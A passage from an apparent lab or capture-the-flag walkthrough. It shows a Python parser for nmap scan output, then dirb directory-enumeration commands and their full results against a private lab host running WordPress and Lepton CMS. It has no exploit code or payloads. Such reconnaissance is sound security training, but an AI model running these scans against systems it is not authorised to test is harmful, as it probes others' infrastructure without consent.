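        elif (m := PORT_RE.match(line)):
            port, proto, state, name, version = m.groups()
            current = Service(int(port), proto, state, name.rstrip("?"),
                              not name.endswith("?"), version or "")
            report.services.append(current)
        elif line.startswith("|"):
            body = line.lstrip("|_ ")      # drop nmap's tree-drawing prefix
            if in_host:
                report.host_scripts.append(body)
            elif current:
                current.scripts.append(body)
        elif line:
            current = None                 # MAC/OS lines end the port section
    return report


def service_table(report: Report) -> List[Tuple[int, str, str]]:
    """(port, service, product) rows: the table the write-up builds by hand."""
    return [(s.port, s.name, s.product)
            for s in sorted(report.services, key=lambda s: s.port) if s.state == "open"]


# Script output a defender triages first: robots.txt advertising paths, SMB
# signing off, a resolver volunteering its version, mail capability banners.
NOTABLE = ("disallowed entry", "message_signing: disabled", "bind.version", "capabilities")


def notable_findings(report: Report) -> List[Tuple[str, str]]:
    hits = [(f"{s.port}/{s.proto}", ln) for s in report.services
            for ln in s.scripts if any(k in ln for k in NOTABLE)]
    hits += [("host", ln) for ln in report.host_scripts if any(k in ln for k in NOTABLE)]
    return hits
```

Feed `parse_nmap` the saved output of `nmap -A ... -oN scan.txt` and `service_table` reproduces the summary table while `notable_findings` lists the script lines worth a second look.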
Hunting Flag 1: Web
Using dirb
Run,
dirb http://192.168.0.122
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
Result
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jan 23 21:31:24 2023
URL_BASE: http://192.168.0.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.122/ ----
+ http://192.168.0.122/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.0.122/hacking (CODE:200|SIZE:616848)
+ http://192.168.0.122/index (CODE:200|SIZE:100)
+ http://192.168.0.122/index.html (CODE:200|SIZE:100)
+ http://192.168.0.122/LICENSE (CODE:200|SIZE:1672)
+ http://192.168.0.122/robots (CODE:200|SIZE:271)
+ http://192.168.0.122/robots.txt (CODE:200|SIZE:271)
+ http://192.168.0.122/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.0.122/upload/
==> DIRECTORY: http://192.168.0.122/wordpress/

---- Entering directory: http://192.168.0.122/upload/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/
==> DIRECTORY: http://192.168.0.122/upload/admins/
+ http://192.168.0.122/upload/config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/framework/
==> DIRECTORY: http://192.168.0.122/upload/include/
+ http://192.168.0.122/upload/index (CODE:200|SIZE:3040)
+ http://192.168.0.122/upload/index.php (CODE:200|SIZE:3040)
==> DIRECTORY: http://192.168.0.122/upload/languages/
==> DIRECTORY: http://192.168.0.122/upload/media/
==> DIRECTORY: http://192.168.0.122/upload/modules/
==> DIRECTORY: http://192.168.0.122/upload/page/
==> DIRECTORY: http://192.168.0.122/upload/search/
==> DIRECTORY: http://192.168.0.122/upload/temp/
==> DIRECTORY: http://192.168.0.122/upload/templates/

---- Entering directory: http://192.168.0.122/wordpress/ ----
==> DIRECTORY: http://192.168.0.122/wordpress/index/
+ http://192.168.0.122/wordpress/index.php (CODE:301|SIZE:0)
+ http://192.168.0.122/wordpress/license (CODE:200|SIZE:19930)
+ http://192.168.0.122/wordpress/readme (CODE:200|SIZE:7195)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/
+ http://192.168.0.122/wordpress/wp-blog-header (CODE:200|SIZE:0)
+ http://192.168.0.122/wordpress/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/
+ http://192.168.0.122/wordpress/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-includes/
+ http://192.168.0.122/wordpress/wp-links-opml (CODE:200|SIZE:217)
+ http://192.168.0.122/wordpress/wp-load (CODE:200|SIZE:0)
+ http://192.168.0.122/wordpress/wp-login (CODE:200|SIZE:2530)
+ http://192.168.0.122/wordpress/wp-mail (CODE:500|SIZE:3011)
+ http://192.168.0.122/wordpress/wp-settings (CODE:500|SIZE:0)
+ http://192.168.0.122/wordpress/wp-signup (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-trackback (CODE:200|SIZE:135)
+ http://192.168.0.122/wordpress/xmlrpc (CODE:200|SIZE:42)
+ http://192.168.0.122/wordpress/xmlrpc.php (CODE:200|SIZE:42)

---- Entering directory: http://192.168.0.122/upload/account/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/css/
+ http://192.168.0.122/upload/account/forgot (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/login (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/logout (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/preferences (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/signup (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/account/templates/

---- Entering directory: http://192.168.0.122/upload/admins/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/access/
==> DIRECTORY: http://192.168.0.122/upload/admins/addons/
==> DIRECTORY: http://192.168.0.122/upload/admins/admintools/
==> DIRECTORY: http://192.168.0.122/upload/admins/groups/
+ http://192.168.0.122/upload/admins/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/admins/interface/
==> DIRECTORY: http://192.168.0.122/upload/admins/languages/
==> DIRECTORY: http://192.168.0.122/upload/admins/login/
==> DIRECTORY: http://192.168.0.122/upload/admins/logout/
==> DIRECTORY: http://192.168.0.122/upload/admins/media/
==> DIRECTORY: http://192.168.0.122/upload/admins/modules/
==> DIRECTORY: http://192.168.0.122/upload/admins/pages/
==> DIRECTORY: http://192.168.0.122/upload/admins/preferences/
==> DIRECTORY: http://192.168.0.122/upload/admins/profiles/
==> DIRECTORY: http://192.168.0.122/upload/admins/service/
==> DIRECTORY: http://192.168.0.122/upload/admins/settings/
==> DIRECTORY: http://192.168.0.122/upload/admins/start/
==> DIRECTORY: http://192.168.0.122/upload/admins/support/
==> DIRECTORY: http://192.168.0.122/upload/admins/templates/
==> DIRECTORY: http://192.168.0.122/upload/admins/users/

---- Entering directory: http://192.168.0.122/upload/framework/ ----
==> DIRECTORY: http://192.168.0.122/upload/framework/functions/
+ http://192.168.0.122/upload/framework/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/framework/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/framework/summary (CODE:403|SIZE:88)

---- Entering directory: http://192.168.0.122/upload/include/ ----
+ http://192.168.0.122/upload/include/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/include/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/include/yui/

---- Entering directory: http://192.168.0.122/upload/languages/ ----
+ http://192.168.0.122/upload/languages/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/languages/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/media/ ----
+ http://192.168.0.122/upload/media/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/media/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/modules/ ----
+ http://192.168.0.122/upload/modules/admin (CODE:403|SIZE:79)
+ http://192.168.0.122/upload/modules/admin.php (CODE:403|SIZE:79)
+ http://192.168.0.122/upload/modules/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/modules/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/modules/news/
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/

---- Entering directory: http://192.168.0.122/upload/page/ ----
+ http://192.168.0.122/upload/page/index (CODE:200|SIZE:0)
+ http://192.168.0.122/upload/page/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/page/posts/

---- Entering directory: http://192.168.0.122/upload/search/ ----
+ http://192.168.0.122/upload/search/index (CODE:200|SIZE:3627)
+ http://192.168.0.122/upload/search/index.php (CODE:200|SIZE:3627)

---- Entering directory: http://192.168.0.122/upload/temp/ ----
+ http://192.168.0.122/upload/temp/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/temp/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/upload/temp/search/

---- Entering directory: http://192.168.0.122/upload/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/templates/blank/
+ http://192.168.0.122/upload/templates/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/templates/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/wordpress/index/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')

---- Entering directory: http://192.168.0.122/wordpress/wp-admin/ ----
+ http://192.168.0.122/wordpress/wp-admin/about (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/admin (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/comment (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/credits (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/css/
+ http://192.168.0.122/wordpress/wp-admin/customize (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/edit (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/export (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/images/
+ http://192.168.0.122/wordpress/wp-admin/import (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/includes/
+ http://192.168.0.122/wordpress/wp-admin/index (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/install (CODE:200|SIZE:1080)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/js/
+ http://192.168.0.122/wordpress/wp-admin/link (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/maint/
+ http://192.168.0.122/wordpress/wp-admin/media (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/menu (CODE:500|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/moderation (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/network/
+ http://192.168.0.122/wordpress/wp-admin/options (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/plugins (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/post (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/profile (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/themes (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/tools (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/update (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/upgrade (CODE:200|SIZE:1173)
+ http://192.168.0.122/wordpress/wp-admin/upload (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/user/
+ http://192.168.0.122/wordpress/wp-admin/users (CODE:302|SIZE:0)
+ http://192.168.0.122/wordpress/wp-admin/widgets (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/wordpress/wp-content/ ----
+ http://192.168.0.122/wordpress/wp-content/index (CODE:200|SIZE:0)
+ http://192.168.0.122/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/uploads/

---- Entering directory: http://192.168.0.122/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.122/upload/account/css/ ----
+ http://192.168.0.122/upload/account/css/frontend (CODE:200|SIZE:1931)
+ http://192.168.0.122/upload/account/css/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/css/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/account/templates/ ----
+ http://192.168.0.122/upload/account/templates/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/account/templates/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/access/ ----
+ http://192.168.0.122/upload/admins/access/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/access/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/addons/ ----
+ http://192.168.0.122/upload/admins/addons/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/addons/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/admintools/ ----
+ http://192.168.0.122/upload/admins/admintools/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/admintools/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/admintools/tool (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/groups/ ----
+ http://192.168.0.122/upload/admins/groups/add (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/groups/groups (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/groups/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/groups/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/groups/save (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/interface/ ----
+ http://192.168.0.122/upload/admins/interface/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/interface/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/interface/version (CODE:403|SIZE:90)

---- Entering directory: http://192.168.0.122/upload/admins/languages/ ----
+ http://192.168.0.122/upload/admins/languages/details (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/languages/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/languages/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/languages/install (CODE:500|SIZE:0)
+ http://192.168.0.122/upload/admins/languages/uninstall (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/login/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/login/forgot/
+ http://192.168.0.122/upload/admins/login/index (CODE:200|SIZE:2929)
+ http://192.168.0.122/upload/admins/login/index.php (CODE:200|SIZE:2929)

---- Entering directory: http://192.168.0.122/upload/admins/logout/ ----
+ http://192.168.0.122/upload/admins/logout/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/logout/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/media/ ----
+ http://192.168.0.122/upload/admins/media/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/media/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/media/thumb (CODE:200|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/modules/ ----
+ http://192.168.0.122/upload/admins/modules/details (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/modules/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/modules/index.php (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/modules/install (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/modules/uninstall (CODE:302|SIZE:0)

---- Entering directory: http://192.168.0.122/upload/admins/pages/ ----
+ http://192.168.0.122/upload/admins/pages/add (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/pages/delete (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/pages/index (CODE:302|SIZE:0)
+ http://192.168.0.122/upload/admins/pages/index.php (CODE:302|SIZE:0)
+
http://192.168.0.122/upload/admins/pages/modify (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/restore (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/sections (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/settings (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/trash (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/preferences/ ---- + http://192.168.0.122/upload/admins/preferences/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/preferences/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/preferences/save (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/profiles/ ---- + http://192.168.0.122/upload/admins/profiles/index (CODE:200|SIZE:324) + http://192.168.0.122/upload/admins/profiles/index.php (CODE:200|SIZE:324) ---- Entering directory: http://192.168.0.122/upload/admins/service/ ---- + http://192.168.0.122/upload/admins/service/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/service/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/settings/ ---- + http://192.168.0.122/upload/admins/settings/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/setting (CODE:200|SIZE:3839) ---- Entering directory: http://192.168.0.122/upload/admins/start/ ---- + http://192.168.0.122/upload/admins/start/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/start/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/support/ ---- + http://192.168.0.122/upload/admins/support/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/support/index.php (CODE:302|SIZE:0) ---- Entering directory: 
http://192.168.0.122/upload/admins/templates/ ---- + http://192.168.0.122/upload/admins/templates/details (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/install (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/uninstall (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/users/ ---- + http://192.168.0.122/upload/admins/users/add (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/users (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/framework/functions/ ---- + http://192.168.0.122/upload/framework/functions/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/framework/functions/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/include/yui/ ---- ==> DIRECTORY: http://192.168.0.122/upload/include/yui/event/ + http://192.168.0.122/upload/include/yui/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/README (CODE:200|SIZE:8488) ==> DIRECTORY: http://192.168.0.122/upload/include/yui/yahoo/ ---- Entering directory: http://192.168.0.122/upload/modules/news/ ---- + http://192.168.0.122/upload/modules/news/add (CODE:403|SIZE:82) + http://192.168.0.122/upload/modules/news/comment (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/css/ + http://192.168.0.122/upload/modules/news/delete (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/news/icon (CODE:200|SIZE:1058) + http://192.168.0.122/upload/modules/news/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/index.php 
(CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/info (CODE:403|SIZE:83) + http://192.168.0.122/upload/modules/news/info.php (CODE:403|SIZE:83) + http://192.168.0.122/upload/modules/news/install (CODE:403|SIZE:86) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/languages/ + http://192.168.0.122/upload/modules/news/modify (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/news/rss (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/search (CODE:403|SIZE:85) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/ + http://192.168.0.122/upload/modules/news/uninstall (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/news/upgrade (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/news/view (CODE:403|SIZE:83) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/ ---- + http://192.168.0.122/upload/modules/wysiwyg/add (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/wysiwyg/delete (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/wysiwyg/icon (CODE:200|SIZE:1058) + http://192.168.0.122/upload/modules/wysiwyg/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/info (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/wysiwyg/info.php (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/wysiwyg/install (CODE:403|SIZE:89) ==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/languages/ + http://192.168.0.122/upload/modules/wysiwyg/modify (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/wysiwyg/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/search (CODE:403|SIZE:88) ==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/templates/ + http://192.168.0.122/upload/modules/wysiwyg/upgrade (CODE:403|SIZE:89) + http://192.168.0.122/upload/modules/wysiwyg/view (CODE:403|SIZE:86) ---- Entering directory: http://192.168.0.122/upload/page/posts/ ---- + 
http://192.168.0.122/upload/page/posts/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/page/posts/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/temp/search/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/upload/templates/blank/ ---- + http://192.168.0.122/upload/templates/blank/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/templates/blank/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/templates/blank/info (CODE:403|SIZE:86) + http://192.168.0.122/upload/templates/blank/info.php (CODE:403|SIZE:86) + http://192.168.0.122/upload/templates/blank/preview (CODE:200|SIZE:1377) + http://192.168.0.122/upload/templates/blank/template (CODE:200|SIZE:507) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. 
(Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/network/ ---- + http://192.168.0.122/wordpress/wp-admin/network/about (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/admin (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/credits (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/edit (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/index (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/menu (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/plugins (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/profile (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/settings (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/setup (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/sites (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/themes (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/update (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/upgrade (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/users (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/user/ ---- + http://192.168.0.122/wordpress/wp-admin/user/about (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/admin (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/credits (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/index (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/menu (CODE:500|SIZE:0) + 
http://192.168.0.122/wordpress/wp-admin/user/profile (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/plugins/ ---- + http://192.168.0.122/wordpress/wp-content/plugins/hello (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-content/plugins/index (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/themes/ ---- + http://192.168.0.122/wordpress/wp-content/themes/index (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/upload/admins/login/forgot/ ---- + http://192.168.0.122/upload/admins/login/forgot/index (CODE:200|SIZE:2531) + http://192.168.0.122/upload/admins/login/forgot/index.php (CODE:200|SIZE:2531) ---- Entering directory: http://192.168.0.122/upload/include/yui/event/ ---- + http://192.168.0.122/upload/include/yui/event/event (CODE:200|SIZE:87537) + http://192.168.0.122/upload/include/yui/event/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/event/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/event/README (CODE:200|SIZE:9807) ---- Entering directory: http://192.168.0.122/upload/include/yui/yahoo/ ---- + http://192.168.0.122/upload/include/yui/yahoo/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/yahoo/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/yahoo/README (CODE:200|SIZE:2889) + http://192.168.0.122/upload/include/yui/yahoo/yahoo (CODE:200|SIZE:35223) ---- Entering directory: 
http://192.168.0.122/upload/modules/news/css/ ---- + http://192.168.0.122/upload/modules/news/css/backend (CODE:200|SIZE:1416) + http://192.168.0.122/upload/modules/news/css/frontend (CODE:200|SIZE:1771) + http://192.168.0.122/upload/modules/news/css/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/css/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/languages/ ---- + http://192.168.0.122/upload/modules/news/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/languages/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/templates/ ---- ==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/backend/ + http://192.168.0.122/upload/modules/news/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/languages/ ---- + http://192.168.0.122/upload/modules/wysiwyg/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/languages/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/templates/ ---- + http://192.168.0.122/upload/modules/wysiwyg/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/templates/backend/ ---- + http://192.168.0.122/upload/modules/news/templates/backend/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/templates/backend/index.php (CODE:302|SIZE:0) ----------------- END_TIME: Mon Jan 23 21:35:16 2023 DOWNLOADED: 258272 - FOUND: 252
Try,
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
The result is not much different from before.
It looks like a CMS (Lepton CMS) is also lurking on this target. Three important files/folders can be seen here:
/upload
/wordpress
/robots.txt
Access robots.txt at the URL
http://192.168.0.122/robots.txt
